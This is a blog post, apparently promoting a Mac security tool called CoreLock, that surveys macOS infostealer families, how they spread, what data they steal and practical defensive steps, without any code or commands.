Mac Infostealers in 2026: What They Steal, How They Spread, and How to Stop Them

In the second half of 2024, Palo Alto Networks' Unit 42 team detected a 101% increase in macOS infostealers in just two quarters. By August 2025, Jamf reported that AMOS malware detections alone had spiked 300%. And as of early 2026, Microsoft Defender Experts is tracking active infostealer campaigns targeting macOS users through social engineering, malvertising, and supply chain attacks.

This is not a theoretical risk. There are now over a dozen active infostealer families targeting macOS, up from two or three in 2023. If you use a Mac and you have passwords, crypto wallets, or session cookies stored on it, you are a target.

I built CoreLock because I got tired of security tools that just show you a list of threats with zero context. The Mac threat landscape has changed dramatically even in the last two years. We are seeing more Go and Rust-based malware targeting macOS, more infostealers sold as a service, and more sophisticated social engineering designed specifically to bypass macOS protections. Here is what you need to know.

What is an infostealer?

An infostealer is malware built for one purpose: extract credentials, cookies, crypto wallets, and sensitive files from your machine and send them to an attacker. Unlike ransomware, which locks your files and demands payment, infostealers operate silently. They get in, harvest everything valuable, and get out.

Speed is the defining characteristic. Most Mac infostealers complete their entire data harvest in under 30 seconds. They copy your Keychain database, scrape browser passwords and cookies, locate cryptocurrency wallet extensions, grab SSH keys, and package everything into a ZIP file that gets exfiltrated to a command-and-control server. By the time you notice anything unusual, your data is already gone.

The business model has changed too. Most of these tools are sold as Malware-as-a-Service (MaaS) on Telegram and underground forums. Anyone with a few hundred dollars a month can rent a fully featured infostealer, complete with a dashboard, customer support, and regular updates. The barrier to entry for attacking Mac users has never been lower.

The major Mac infostealers in 2026

Here are the families you should know about. Understanding what is out there helps you recognize the tactics they use.

Atomic Stealer (AMOS)

Atomic Stealer, also known as AMOS, is the most prolific Mac infostealer in operation. First discovered in April 2023, it is sold as MaaS on Telegram and hacker forums. AMOS targets Keychain passwords, browser data from every major Chromium-based browser, cryptocurrency wallet extensions, and files from your Desktop and Documents folders. It can target more than 200 cryptocurrency wallet extensions and credentials from over 15 password managers, including 1Password, LastPass, and Dashlane.

Recent campaigns have gotten creative. In December 2025, Malwarebytes reported attackers using Google Ads to funnel Mac users to poisoned AI chat conversations that delivered AMOS. Kaspersky documented AMOS being distributed through ChatGPT's shared chat feature, hosting malicious installation guides directly on chatgpt.com. Trend Micro found AMOS being delivered through trojanized OpenClaw skills, representing a new supply chain attack vector where attackers manipulate AI agentic workflows into installing the malware.

Banshee Stealer

Banshee Stealer made headlines for a particularly clever evasion technique. Check Point Research discovered that newer variants adopted the same string encryption algorithm that Apple's own XProtect antivirus engine uses to protect its data. By scrambling its strings and only decrypting them during execution, Banshee evaded static detection by most antivirus engines for over two months.

The original Banshee operation was sold for $3,000 per month. In November 2024, its source code was leaked on the XSS forum, which shut down the original operation but made the code freely available to anyone. That is arguably worse. Now anyone can create their own modified variant, and researchers have been tracking derivatives ever since.

Realst

Realst is notable for being written in Rust, making it cross-platform and harder for traditional security tools to analyze. It initially spread through fake blockchain games with names like Brawl Earth, WildWorld, and Dawnland. In 2024, it pivoted to fake meeting applications. Cado Security Labs documented the "Meeten" campaign, where threat actors created fake Web3 companies with AI-generated content and social media profiles to trick targets into downloading malicious meeting apps. The malware appeared under names like Meeten, Meetio, Meetone, Clusee, and Cuesee.

Realst is laser-focused on crypto. It targets Keychain data, Chromium-based browsers, Telegram, and popular cryptocurrency wallets. The fake meeting app delivery method makes it particularly dangerous because the social engineering is personalized and convincing.

Cthulhu Stealer

Cthulhu Stealer was the budget option in the MaaS market, renting for $500 per month starting in late 2023. Written in Go, it disguised itself as legitimate software and targeted both Intel and Apple Silicon Macs. It dumped iCloud Keychain passwords using an open-source tool called Chainbreaker, harvested browser cookies, and exfiltrated Telegram account information.

The Cthulhu Team's operation eventually collapsed. Affiliates accused the operator of scamming them on payments, leading to a permanent ban from their marketplace. But the code is still out there, and the techniques it used live on in other stealer families.

MacSync and Shamos

Two newer families worth watching. MacSync, which emerged in April 2025, comes with a full-featured Go-based agent that goes beyond simple data theft and enables remote command-and-control capabilities. Its latest variants are delivered as code-signed and notarized Swift applications that bypass Gatekeeper entirely. One campaign distributed it as a fake messaging app installer called "zk-call-messenger."

Shamos, detected by CrowdStrike since June 2025, is a variant of AMOS. It has attempted infections against over 300 environments worldwide. It is distributed through malvertising and fake GitHub repositories using ClickFix-style attacks.

How they get on your Mac

Understanding the delivery mechanisms is half the battle. Here are the primary vectors.

ClickFix attacks

This is the one that concerns me most. Attackers create websites that instruct users to copy and paste commands directly into Terminal. It sounds absurd, but the social engineering is effective. The sites pose as troubleshooting guides, software installers, or verification steps. Microsoft documented ClickFix as one of the most effective delivery mechanisms for macOS infostealers because it completely bypasses Gatekeeper, notarization checks, and code signature verification. The user is essentially installing the malware themselves. I wrote a detailed breakdown of ClickFix if you want to understand the full mechanics.

Fake application installers

Attackers use SEO poisoning and Google Ads to make malicious download pages appear in search results for popular software. You search for a legitimate app, click what looks like the official download link, and get a trojanized installer instead. Fake macOS help sites and fake AI tool installers have been particularly common in recent campaigns.

Fake meeting applications

This vector targets professionals, especially in crypto and Web3. You get a message from someone who wants to set up a call. They send you a link to download their "meeting app." The app looks legitimate, has a professional website, and sometimes even has AI-generated social media accounts for the fake company behind it. Once installed, it silently harvests your data.

Trojanized software and supply chain attacks

Cracked software has always been a malware vector, but the supply chain angle is newer. Trend Micro documented AMOS being distributed through malicious OpenClaw skills, and MacSync campaigns have used fake GitHub repositories masquerading as legitimate developer tools.

Malicious browser extensions

Some infostealers arrive as browser extensions that request broad permissions. Once installed, they can read every page you visit, capture form data, and steal session cookies.

What they steal and how fast

According to SentinelOne's research, there are seven primary categories of data that macOS infostealers target.

Keychain passwords. The macOS Keychain is the crown jewel. Infostealers copy your entire login.keychain-db file. This contains Wi-Fi passwords, application passwords, website credentials, certificates, and encryption keys. AMOS prompts victims for their admin password with a fake system dialog, then uses it to unlock and extract the Keychain database.

Browser data. Login credentials, autofill data, browsing history, and saved credit card numbers from Chrome, Firefox, Safari, Edge, Arc, Brave, Opera, and Vivaldi.

Session cookies. This is the one people underestimate. Stolen session cookies let attackers bypass two-factor authentication entirely. They do not need your password or your 2FA code. They import your session cookie into their browser and they are logged in as you.

Cryptocurrency wallets. Browser extensions like MetaMask, Phantom, Coinbase Wallet, and hundreds of others. Desktop wallets are also targeted.

SSH keys and API tokens. Developers are high-value targets. Your SSH keys give attackers access to your servers. Your API tokens give them access to cloud services, CI/CD pipelines, and production infrastructure.

Files. Many infostealers grab everything from your Desktop and Documents folders. Notes, PDFs, spreadsheets, anything that might contain sensitive information.

System information. Hardware details, installed software, running processes. This data helps attackers identify high-value targets for follow-up attacks.

The entire process typically takes less than 30 seconds from execution to exfiltration. The data is compressed, encrypted, and sent to a C2 server. Some variants, like MacSync, maintain persistent access for ongoing command and control.

How to protect yourself

Here is the practical advice. None of this requires advanced technical knowledge.

Never download software from unofficial sources. If you are searching for an app, go directly to the developer's website or the Mac App Store. Do not trust Google Ads or SEO results for download links. Bookmark the official sites for tools you use regularly.

Never paste Terminal commands from websites. This is the single most important rule. No legitimate service will ever ask you to paste commands into Terminal. If a website tells you to open Terminal and paste something, close the tab immediately. This is the core of ClickFix attacks and it bypasses every built-in macOS protection.

Use a hardware wallet for significant crypto. If you hold cryptocurrency worth more than you can afford to lose, move it to a hardware wallet. Browser extension wallets are the number one target for infostealers. A hardware wallet keeps your keys offline and out of reach.

Keep macOS updated. Apple updates XProtect signatures regularly to detect known infostealer variants. Banshee Stealer's XProtect evasion technique was eventually detected once its source code leaked and antivirus engines could study it. Automatic updates ensure you have the latest protections.

Review your permissions regularly. Check which apps have access to your files, your camera, your microphone, and Full Disk Access. An infostealer that gets Full Disk Access can read your entire Keychain. Remove permissions from apps you no longer use.

Watch for suspicious processes and network activity. Infostealers create new processes and make outbound network connections to exfiltrate your data. Monitoring for anomalous processes and unexpected network traffic is one of the most reliable detection methods. This is a core part of what CoreLock does: it watches for the behavioral patterns that infostealers exhibit, like sudden Keychain access, rapid file enumeration, or unexpected outbound connections, and alerts you in real time.

Be skeptical of unsolicited meeting invitations. If someone you do not know sends you a link to download a meeting app you have never heard of, that is a red flag. Stick to established platforms. Verify the person's identity through a separate channel before downloading anything.

The bigger picture

The reason Mac infostealers are growing so fast is economics. The MaaS model means that anyone can rent a fully featured stealer for a few hundred dollars a month. The macOS user base skews toward professionals, developers, and crypto holders, which means higher-value targets. And the long-standing perception that Macs do not get malware means fewer people are running security tools.

That perception needs to die. In 2026, macOS faces the same class of threats that Windows has dealt with for years, delivered through social engineering that is often more sophisticated than anything we have seen on Windows.

The good news is that most infostealers rely on tricking you into installing them. If you are careful about what you download, skeptical of Terminal commands, and paying attention to what is running on your Mac, you eliminate the vast majority of the risk.

If you want an extra layer of protection, CoreLock monitors for the exact behavioral patterns that infostealers use. It does not just check a signature database. It watches what processes do after they launch, and if something starts harvesting your Keychain, scraping browser data, or making suspicious network connections, you will know about it before the exfiltration completes.

Stay safe out there. If you have questions or think your Mac might already be compromised, check out our guide on how to remove malware from your Mac or the five signs your Mac has been compromised.